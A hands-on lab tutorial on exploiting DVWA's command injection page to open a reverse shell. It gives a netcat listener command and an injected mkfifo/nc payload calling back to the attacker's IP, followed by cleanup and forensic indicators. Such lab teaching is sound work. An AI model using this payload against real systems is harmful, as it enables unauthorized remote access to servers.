Hands-on mkfifo attack backdoor in DVWA via Command Injection (en)
Hands-On: Creating a Backdoor via Command Injection in DVWA
Objective: Exploit the command injection vulnerability in DVWA to open a backdoor on the target system.
Prerequisites:
- DVWA is set up with security level "Low" on the target system.
- You have access to Kali Linux (or any other system with netcat).
- You know the IP address of your attack machine.
Note: This tutorial is for educational purposes only. Do not attempt on unauthorized systems.
Step 1: Understanding the Target
- Log in to DVWA with default credentials (username: `admin`, password: `password`).
- Navigate to Command Injection under the Vulnerabilities section.
- This page has a command injection vulnerability, where user input is not sanitized before being executed on the server.
Step 2: Start a Netcat Listener on the Attacker Machine
To listen for incoming connections, set up a Netcat listener on your machine. Open a terminal in Kali Linux and run:
nc -lvp 4444
This command opens a listener on port 4444, waiting for connections.
Step 3: Exploit Command Injection to Create a Backdoor
In DVWA's Command Injection input field, enter the following command:
<Your IP Address>; mkfifo /tmp/pipe; sh /tmp/pipe | nc <Your IP Address> 4444 > /tmp/pipe
- Replace `<Your IP Address>` with the IP of your attacker machine.
- This command:
- Uses a semicolon `;` to terminate the existing command.
- Creates a named pipe (`/tmp/pipe`) as a communication channel.
- Opens a shell that pipes output to `nc` (netcat), sending input back from `nc` through `/tmp/pipe`.
Step 4: Trigger the Backdoor
Click Submit to execute the command. If successful, the DVWA server connects to your Netcat listener, opening a reverse shell.
Step 5: Verify Shell Access
In the Kali terminal, you should see a connection from the DVWA server. You can now execute commands on the server as the `www-data` user:
whoami uname -a
Step 6: Clean Up
When done, remove the pipe file to close the backdoor:
rm /tmp/pipe
Ensure to delete any other files or processes created during testing.
Analysis in Forensics
For forensic analysis, investigate:
- Logs in `/var/log/apache2` (or similar) to find evidence of injected commands.
- Network Activity for unusual external connections.
- File System changes, like `/tmp/pipe` or unexpected scripts.
This exercise demonstrates how attackers might exploit web applications to gain unauthorized access. Proper security, like input sanitization and system monitoring, can help prevent such exploits.